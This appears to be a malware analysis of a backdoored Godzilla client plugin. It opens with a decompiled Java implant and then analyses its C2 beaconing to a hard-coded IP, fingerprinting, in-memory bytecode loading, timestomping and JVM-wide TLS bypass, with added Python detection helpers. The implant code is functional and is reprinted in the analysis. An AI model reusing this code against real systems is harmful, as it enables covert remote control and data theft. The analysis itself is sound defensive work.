var10 = "true";
}
} else if (var8.contains("mac")) {
var7 = "m";
var9 = this.runCommand(new String[]{"bash", "-c", "uname -a"});
if (isUnixRoot()) {
var10 = "true";
}
} else {
var9 = this.runCommand(new String[]{"bash", "-c", "uname -a"});
if (isUnixRoot()) {
var10 = "true";
}
}

String var11 = ManagementFactory.getRuntimeMXBean().getName();
String var12 = var11.split("@")[0];
ArrayList var13 = new ArrayList();
ArrayList var14 = new ArrayList();
this.getAllIpv4MacInfo(var13, var14);
String var15 = String.join(",", var14);
var1.put("id", cId);
var1.put("h", var4);
var1.put("u", var6);
var1.put("s", var7);
var1.put("i", var12);
var1.put("a", var9);
var1.put("p", String.join(",", var13));
var1.put("m", var15);
var1.put("r", var10);
var1.put("n", this.getJarPath());
var1.put("e", String.valueOf(this.sleepTime));
} catch (Exception var16) {
var1.put("error", getStackTrace(var16));
}

return var1;
}

public static boolean updateFileLastModified(String var0, String var1) {
try {
long var2 = Long.parseLong(var0);
long var4 = var2 * 1000L;
File var6 = new File(var1);
if (var6.exists() && var6.isFile()) {
boolean var7 = var6.setLastModified(var4);
if (!var7) {
}

return var7;
}

return false;
} catch (NumberFormatException var8) {
} catch (Exception var9) {
}

return false;
}

private String saveFile(String var1) {
HashMap var2 = new HashMap();
HashMap var3 = new HashMap();
var3.put("t", "4");

try {
String var4 = "";
String[] var5 = var1.split("\\|");
if (var5.length != 3 && var5.length != 4) {
var3.put("s", "0");
var3.put("e", "error file format");
return mapToJson(var3);
}

if (var5.length == 4) {
var4 = var5[3];
}

String var6 = "";
if (var5[0] != null && !var5[0].isEmpty()) {
var6 = var5[0];
} else {
var6 = System.getProperty("java.io.tmpdir");
}

String var7 = Paths.get(var6, var5[1]).toString();
byte[] var8 = Base64.getDecoder().decode(var5[2]);
FileOutputStream var9 = new FileOutputStream(var7);
var9.write(var8, 0, var8.length);
var9.close();
File var10 = new File(var7);
var10.setExecutable(true);
var10.setReadable(true);
var10.setWritable(true);
if (var4 != null && !var4.isEmpty()) {
updateFileLastModified(var4, var7);
}

var2.put("b", String.valueOf(var10.length()));
var3.put("s", "1");
var3.put("m", var2);
} catch (Exception var11) {
var3.put("s", "0");
var3.put("e", getStackTrace(var11));
}

return mapToJson(var3);
}

private String loader(byte[] var1) {
String var2 = "";
MyPlugin var3 = new MyPlugin(ClassLoader.getSystemClassLoader());

try {
Class var4 = var3.define("plugin", var1);
Object var11 = var4.newInstance();
var2 = var11.toString();
} catch (Exception var8) {
StringWriter var5 = new StringWriter();
PrintWriter var6 = new PrintWriter(var5);
var8.printStackTrace(var6);
String var7 = var5.toString();
var2 = var7;
}

Object var10 = null;
System.gc();
return var2;
}

private boolean handle(String var1) {
while(true) {
String var2 = var1.substring(0, 1);
String var3 = var1.substring(2);
switch (var2) {
case "0":
return true;
case "1":
String var8 = this.loader(Base64.getDecoder().decode(var3));
var1 = this.sendRes(var8, this.sid);
if (var1 != "") {
break;
}

return true;
case "2":
this.loader(Base64.getDecoder().decode(var3));
return true;
case "3":
return false;
case "4":
String[] var7 = var3.split(":");
if (var7.length > 1) {
this.sleepTime = Integer.parseInt(var7[0]);
this.sleepJitter = Integer.parseInt(var7[1]);
} else {
this.sleepTime = Integer.parseInt(var3);
}

return true;
case "5":
String var6 = this.saveFile(var3);
var1 = this.sendRes(var6, this.sid);
if (var1 != "") {
break;
}

return true;
default:
return true;
}
}
}

public String toString() {
Thread var1 = new Thread(() -> {
Map var1 = this.getInfo();
HashMap var2 = new HashMap();
if (var1.containsKey("error")) {
var2.put("t", "0");
var2.put("s", "0");
var2.put("e", var1.get("error"));
var2.remove("error");
} else {
var2.put("t", "0");
var2.put("s", "1");
}

requestProperty = this.parseJson(headerStr);

while(true) {
var2.put("m", var1);
this.sendRes(mapToJson(var2), cId);
if (this.sid != null || !this.sid.isEmpty()) {
while(true) {
var1.put("e", String.valueOf(this.sleepTime));
var2.put("m", var1);

try {
String var3 = this.sendRes(mapToJson(var2), this.sid);
if (var3 != "" && !this.handle(var3)) {
return;
}
} catch (Exception var5) {
}

try {
Thread.sleep((long)genSleepTime(this.sleepTime * 1000, this.sleepJitter));
} catch (InterruptedException var4) {
}
}
}

try {
Thread.sleep((long)genSleepTime(this.sleepTime * 1000, this.sleepJitter));
} catch (InterruptedException var6) {
}
}
});
var1.start();
return "";
}

public X509Certificate[] getAcceptedIssuers() {
return null;
}

public void checkClientTrusted(X509Certificate[] var1, String var2) {
}

public void checkServerTrusted(X509Certificate[] var1, String var2) {
}

public boolean verify(String var1, SSLSession var2) {
return true;
}

static {
try {
SSLContext var0 = SSLContext.getInstance("SSL");
var0.init((KeyManager[])null, new TrustManager[]{new MyPlugin()}, new SecureRandom());
HttpsURLConnection.setDefaultSSLSocketFactory(var0.getSocketFactory());
HttpsURLConnection.setDefaultHostnameVerifier(new MyPlugin());
} catch (Exception var1) {
}

}
}

I. Communication and control mechanism (source-level analysis)

  1. C2 communication initialisation

    • Hard-coded URL
      private static String url = "https://206.206.78.190/godzilla/release.txt"; // the C2 address, the first IP in the advisory's IOC list
    • Request-header spoofing
      // headerStr fakes a browser User-Agent
      private static String headerStr = "{\"Content-Type\":\"text/plain; charset=utf-8\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 11.0...) Chrome/112.0...\"}";
      requestProperty = this.parseJson(headerStr); // parsed into request-header key/value pairs
      The spoof is sloppy: no real Chrome build reports "Windows NT 11.0" (Windows 11 still identifies as NT 10.0), so this exact User-Agent string is itself a usable proxy/IDS signature.
  2. Encrypted communication flow

    • Sending data (sendRes method):
      // plaintext is encrypted before it is written to the socket (key lines)
      var1 = this.encrypt(var1.getBytes(StandardCharsets.UTF_8)); // encrypt the request body
      OutputStream var30 = var3.getOutputStream();
      var30.write(var1.getBytes("UTF-8")); // send the encrypted data
    • Response handling
      // decrypt the server response (key lines)
      byte[] var35 = readAllBytes(var34); // read the whole response stream
      String var36 = new String(var35, StandardCharsets.UTF_8);
      var4 = new String(this.decrypt(var36), StandardCharsets.UTF_8); // decrypt before dispatch
  3. Command dispatch (handle method)

    • Dynamic plugin loading (command "1"):
      case "1":
      String var8 = this.loader(Base64.getDecoder().decode(var3)); // decode the bytecode and load it
      var1 = this.sendRes(var8, this.sid); // send the result back to the C2
      break;
    • File write (command "5"):
      case "5":
      String var6 = this.saveFile(var3); // file-write logic
      var1 = this.sendRes(var6, this.sid); // report the write result
      break;
    • The case immediately before "5" in the decompiled handle method (visible at the top of the listing above) rewrites sleepTime, and sleepJitter when a second value is supplied, so the operator can retune the beacon interval from the server. Every case that returns true keeps the polling loop in toString alive; returning false ends it.
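As an added example, not code from the write-up or from the sample, here is the extraction step an analyst performs before pushing the IOCs into the blocking devices the advisory mentions: read the Java String fields out of the decompiled source, unescape them, parse headerStr into the same key/value map parseJson builds, and report the C2 host, path and spoofed headers. The source excerpt it runs on is constructed from the two lines quoted above; the field names url and headerStr are the sample's, while the function names and the implausible-User-Agent check are my own.

```python
import json
import re
from ipaddress import ip_address
from urllib.parse import urlsplit

# Constructed input: the two field declarations quoted in the write-up above
# (the User-Agent is abbreviated with "..." exactly as the page abbreviates it).
DECOMPILED_SRC = r'''
private static String url = "https://206.206.78.190/godzilla/release.txt";
private static String headerStr = "{\"Content-Type\":\"text/plain; charset=utf-8\", \"User-Agent\":\"Mozilla/5.0 (Windows NT 11.0...) Chrome/112.0...\"}";
'''

# Matches `String name = "...";` and tolerates escaped quotes inside the literal.
JAVA_STRING_FIELD = re.compile(
    r'String\s+(?P<name>\w+)\s*=\s*"(?P<value>(?:\\.|[^"\\])*)"\s*;')

# Platform tokens a genuine Chrome-on-Windows UA can carry. Windows 11 still reports
# "Windows NT 10.0", so "Windows NT 11.0" marks the UA as fabricated.
REAL_WINDOWS_NT_TOKENS = {
    "Windows NT 5.1", "Windows NT 5.2", "Windows NT 6.0", "Windows NT 6.1",
    "Windows NT 6.2", "Windows NT 6.3", "Windows NT 10.0",
}


def unescape_java(literal: str) -> str:
    """Undo the escapes used inside a Java string literal (escaped quote, backslash, n, t, r)."""
    simple = {"n": "\n", "t": "\t", "r": "\r"}
    return re.sub(r"\\(.)", lambda m: simple.get(m.group(1), m.group(1)), literal)


def string_fields(src: str) -> dict:
    """Return {field_name: unescaped_value} for every String field in the source."""
    return {m["name"]: unescape_java(m["value"]) for m in JAVA_STRING_FIELD.finditer(src)}


def c2_profile(src: str) -> dict:
    """Build a C2 profile from the hard-coded `url` and `headerStr` fields."""
    fields = string_fields(src)
    url = fields.get("url", "")
    parts = urlsplit(url)
    host = parts.hostname or ""
    try:
        ip_address(host)
        host_is_ip = True          # literal IP rather than a domain: nothing to pivot on in DNS logs
    except ValueError:
        host_is_ip = False
    # headerStr is a JSON object; json.loads yields the key/value map parseJson builds.
    headers = json.loads(fields.get("headerStr", "{}"))
    ua = headers.get("User-Agent", "")
    nt_token = re.search(r"Windows NT \d+\.\d+", ua)
    return {
        "url": url,
        "scheme": parts.scheme,
        "host": host,
        "host_is_ip": host_is_ip,
        "path": parts.path,
        "headers": headers,
        "spoofed_browser_ua": ua.startswith("Mozilla/"),
        "ua_implausible": bool(nt_token) and nt_token.group(0) not in REAL_WINDOWS_NT_TOKENS,
    }


def iocs(profile: dict) -> list:
    """Network IOCs worth blocking: the full URL, plus the host on its own when it is a literal IP."""
    out = [profile["url"]]
    if profile["host_is_ip"]:
        out.append(profile["host"])
    return out


if __name__ == "__main__":
    prof = c2_profile(DECOMPILED_SRC)
    for key, value in prof.items():
        print(f"{key}: {value}")
    print("IOCs:", iocs(prof))
```

Run it against the jadx output of any plugin jar before installing it; a plugin whose String fields contain a raw-IP HTTPS URL and a hand-written browser User-Agent deserves the same scrutiny this sample got.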

II. Persistence and detection evasion (source-level analysis)

  1. File persistence (saveFile method)

    • File write and permission change
      FileOutputStream var9 = new FileOutputStream(var7); // write to the operator-supplied target path
      var9.write(var8, 0, var8.length); // content is the Base64-decoded payload
      var10.setExecutable(true); // mark executable (meaningful on Linux/Unix)
      var10.setReadable(true);
      var10.setWritable(true);
    • Timestamp forgery
      if (var4 != null && !var4.isEmpty()) {
      updateFileLastModified(var4, var7); // rewrite the file's mtime to an operator-supplied value (timestomping), so "recently modified" sweeps miss it
      }
  2. Communication evasion

    • Sleep jitter (genSleepTime method):
      public static int genSleepTime(int var0, int var1) {
      int var2 = (int)Math.round((double)var0 * ((double)var1 / 100.0F)); // jitter expressed as a percentage of the base interval
      int var3 = var0 - var2; // lower bound, e.g. 60 s with 50 % jitter gives 30 s
      int var4 = var0 + var2; // upper bound, 90 s in the same example
      return new Random().nextInt(var4 - var3 + 1) + var3; // uniform pick in [var3, var4]
      }
      The caller passes this.sleepTime * 1000, so sleepTime is in seconds and the result in milliseconds. A detector that looks for identical inter-connection gaps never fires on this; the gaps are only bounded, not constant.
    • TLS certificate bypass (static initialiser):
      static {
      SSLContext var0 = SSLContext.getInstance("SSL");
      var0.init(null, new TrustManager[]{new MyPlugin()}, new SecureRandom()); // MyPlugin's empty checkServerTrusted accepts every certificate
      HttpsURLConnection.setDefaultSSLSocketFactory(var0.getSocketFactory()); // installed as the process-wide default
      HttpsURLConnection.setDefaultHostnameVerifier(new MyPlugin()); // verify() always returns true, so hostname checks are gone as well
      }
      Because both calls set JVM-wide defaults, every HttpsURLConnection in the host process (the Godzilla client itself included) loses certificate validation the moment the plugin class is loaded, not just the C2 channel. The implant therefore talks to a self-signed or arbitrary certificate on 206.206.78.190 without complaint, and it is equally blind to a TLS-intercepting proxy, which is convenient for anyone capturing its traffic.
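To make the jitter concrete, and to show what a network detector should do instead of looking for a fixed interval, here is an added example (my code, not the sample's and not part of the original write-up): a Python port of genSleepTime with the same bounds, and a beaconing check over a constructed proxy log. The log format ("timestamp src dst"), the two hosts and the 50 % jitter threshold are assumptions for the demonstration; the bound it computes holds for any implant whose gaps are confined to base ± jitter.

```python
import random
import statistics
from collections import defaultdict
from datetime import datetime


def gen_sleep_time(base_ms: int, jitter_pct: int, rng=random) -> int:
    """Python port of MyPlugin.genSleepTime: uniform pick in [base - j%, base + j%]."""
    delta = int(base_ms * (jitter_pct / 100.0) + 0.5)   # Java Math.round for positive values
    lo, hi = base_ms - delta, base_ms + delta
    return rng.randint(lo, hi)                          # inclusive, like nextInt(hi - lo + 1) + lo


# Constructed proxy log, "timestamp src dst". 10.1.2.3 is an implant polling its C2 with
# sleepTime=60 and sleepJitter=50 (gaps 45,72,33,88,51,66,40 s); 10.1.2.9 is ordinary traffic
# to a TEST-NET address with no rhythm at all (gaps 5,300,12,900,7,200 s).
SAMPLE_LOG = """\
2024-05-06T10:00:00 10.1.2.3 206.206.78.190
2024-05-06T10:00:45 10.1.2.3 206.206.78.190
2024-05-06T10:01:57 10.1.2.3 206.206.78.190
2024-05-06T10:02:30 10.1.2.3 206.206.78.190
2024-05-06T10:03:58 10.1.2.3 206.206.78.190
2024-05-06T10:04:49 10.1.2.3 206.206.78.190
2024-05-06T10:05:55 10.1.2.3 206.206.78.190
2024-05-06T10:06:35 10.1.2.3 206.206.78.190
2024-05-06T10:00:00 10.1.2.9 198.51.100.7
2024-05-06T10:00:05 10.1.2.9 198.51.100.7
2024-05-06T10:05:05 10.1.2.9 198.51.100.7
2024-05-06T10:05:17 10.1.2.9 198.51.100.7
2024-05-06T10:20:17 10.1.2.9 198.51.100.7
2024-05-06T10:20:24 10.1.2.9 198.51.100.7
2024-05-06T10:23:44 10.1.2.9 198.51.100.7
"""


def gap_profile(timestamps, max_jitter=0.5, min_events=6) -> dict:
    """Classify one (src, dst) series.

    If every gap lies in [base*(1-j), base*(1+j)], then (max-min)/(max+min), the half-spread
    relative to the midrange, can never exceed j. That ratio is therefore an upper bound on the
    jitter the operator configured, and a series whose bound stays under max_jitter is treated
    as a beacon. An unjittered fixed-interval check would never fire on the sample above.
    """
    ts = sorted(timestamps)
    gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
    if len(ts) < min_events or not gaps:
        return {"beacon": False, "events": len(ts), "base_s": None, "jitter_bound": None}
    lo, hi = min(gaps), max(gaps)
    base = (hi + lo) / 2            # midrange: unbiased for a symmetric uniform jitter
    bound = (hi - lo) / (hi + lo)   # equals max |gap - base| / base over the series
    return {
        "beacon": bound <= max_jitter,
        "events": len(ts),
        "base_s": base,
        "jitter_bound": bound,
        "median_gap_s": statistics.median(gaps),
    }


def find_beacons(log_text: str, **kwargs) -> dict:
    """Group log lines by (src, dst) and profile each series."""
    series = defaultdict(list)
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, dst = line.split()
        series[(src, dst)].append(datetime.fromisoformat(ts))
    return {pair: gap_profile(times, **kwargs) for pair, times in series.items()}


if __name__ == "__main__":
    print("sample sleeps (ms):", [gen_sleep_time(60000, 50) for _ in range(5)])
    for pair, prof in find_beacons(SAMPLE_LOG).items():
        print(pair, prof)
```

The threshold is a knob, not a constant: a larger configured jitter raises the bound above 0.5 and evades this check, while too low a threshold misses the sample. In production the series also needs a minimum event count and a rarity filter on the destination, otherwise a legitimate polling client with its own jitter looks the same.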

III. Data collection (source-level analysis)

  1. System information (getInfo method)

    • Hostname and IP address
      InetAddress var2 = InetAddress.getLocalHost();
      String var3 = var2.getHostAddress(); // local IP address
      String var4 = var2.getHostName(); // hostname
    • User and process information
      String var6 = System.getProperty("user.name"); // current user name
      String var11 = ManagementFactory.getRuntimeMXBean().getName(); // "pid@hostname"
      String var12 = var11.split("@")[0]; // process ID of the JVM the plugin runs in
  2. Network fingerprinting (getAllIpv4MacInfo method)

    • MAC address enumeration
      Enumeration var4 = NetworkInterface.getNetworkInterfaces();
      while (var4.hasMoreElements()) {
      NetworkInterface var5 = (NetworkInterface)var4.nextElement();
      byte[] var6 = var5.getHardwareAddress(); // NIC MAC address (null for loopback and many virtual interfaces; the excerpt shows no null check)
      // formatted as XX-XX-XX-XX-XX-XX
      StringBuilder var7 = new StringBuilder();
      for (int var8=0; var8<var6.length; ++var8) {
      var7.append(String.format("%02X%s", var6[var8], var8 < var6.length-1 ? "-" : ""));
      }
      }
  3. Privilege check

    • Windows administrator check
      Process var1 = Runtime.getRuntime().exec("net session"); // a command that only succeeds with admin rights
      int var2 = var1.waitFor(); // exit code 0 means the process is elevated
    • Linux root check
      Process var0 = Runtime.getRuntime().exec("id -u");
      Scanner var1 = new Scanner(var0.getInputStream());
      if (var1.nextInt() == 0) { // UID 0 is root
      return true;
      }
      Both checks spawn a child process from the Java runtime, so on an endpoint with process telemetry the parent/child pair (java.exe launching net.exe, or a JVM launching id) is a cheap hunting query; the Godzilla client has no legitimate reason to run either command.
IV. Other notable behaviour (supplementary)

  1. Dynamic class loading (loader method)

    MyPlugin var3 = new MyPlugin(ClassLoader.getSystemClassLoader()); // MyPlugin takes a parent ClassLoader; define() evidently wraps defineClass
    Class var4 = var3.define("plugin", var1); // defines a class straight from the bytes received from the C2
    Object var11 = var4.newInstance(); // instantiation runs the payload's static initialiser and constructor
    • Risk: arbitrary second-stage bytecode (an in-memory webshell, "内存马", for example) runs inside the Godzilla client's JVM with nothing written to disk, so file-based scanning of the plugin directory sees only the loader.
  2. Silent exception handling

    catch (Exception var27) {} // empty catch block: every failure is swallowed
    • Purpose: a failed C2 connection, a bad command or a write error never produces a stack trace, a log line or a crash that would reveal the implant to the user; the loop in toString simply sleeps and tries again.
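The bytecode that command "1" delivers and a class hidden inside a long Base64 string literal are handled the same way during triage: decode, check the class-file magic, note the target Java version, and dump the bytes to a .class file for jadx or IDEA. The following Python helper is an added example (mine, not the sample's and not part of the original write-up) that does exactly that over decompiled source. The class-file header it runs on is constructed, not bytes from the sample, and the field name notes is invented; the 64-character minimum for a literal is a tuning choice.

```python
import base64
import hashlib
import re
import struct
from pathlib import Path

CLASS_MAGIC = 0xCAFEBABE
# A Java string literal of at least 64 base64 characters; shorter ones are rarely worth decoding.
BASE64_LITERAL = re.compile(r'"([A-Za-z0-9+/]{64,}={0,2})"')

# Constructed input: a fake class-file *header* (magic, minor=0, major=52 = Java 8,
# constant_pool_count=1) padded with zeros. It is not a loadable class, just enough
# bytes to exercise the magic/version check. The second literal is plain text.
FAKE_CLASS = struct.pack(">IHHH", CLASS_MAGIC, 0, 52, 1) + b"\x00" * 56
SAMPLE_SRC = (
    'private static String postConfluenceClassBase64 = "%s";\n'
    'private static String notes = "%s";\n'
    % (base64.b64encode(FAKE_CLASS).decode(), base64.b64encode(b"just text " * 8).decode())
)


def java_version(major: int) -> str:
    """Map a class-file major version to the Java release that emits it (45=1.1 ... 52=8, 61=17)."""
    return str(major - 44) if major >= 49 else f"1.{major - 44}"


def find_embedded_classes(src: str) -> list:
    """Decode every long base64 literal and keep those that start with 0xCAFEBABE."""
    hits = []
    for m in BASE64_LITERAL.finditer(src):
        try:
            blob = base64.b64decode(m.group(1), validate=True)
        except ValueError:            # binascii.Error is a ValueError subclass
            continue
        if len(blob) < 10 or struct.unpack(">I", blob[:4])[0] != CLASS_MAGIC:
            continue
        minor, major, cp_count = struct.unpack(">HHH", blob[4:10])
        hits.append({
            "offset": m.start(1),
            "size": len(blob),
            "minor": minor,
            "major": major,
            "java": java_version(major),
            "constant_pool_count": cp_count,
            "sha256": hashlib.sha256(blob).hexdigest(),
            "bytes": blob,
        })
    return hits


def dump_classes(hits: list, outdir: str) -> list:
    """Write each hit to <outdir>/<sha256>.class for jadx/IDEA; returns the paths written."""
    out = Path(outdir)
    out.mkdir(parents=True, exist_ok=True)
    paths = []
    for h in hits:
        p = out / f"{h['sha256']}.class"
        p.write_bytes(h["bytes"])
        paths.append(str(p))
    return paths


if __name__ == "__main__":
    for h in find_embedded_classes(SAMPLE_SRC):
        print(f"offset={h['offset']} size={h['size']} major={h['major']} "
              f"(Java {h['java']}) sha256={h['sha256']}")
```

The SHA-256 of each dumped class is what goes into the IOC list alongside the jar hash, since the embedded class is the part that actually executes. Decompilers usually keep a long literal in one piece, but if the author splits it with string concatenation the regex will see only fragments; join them first.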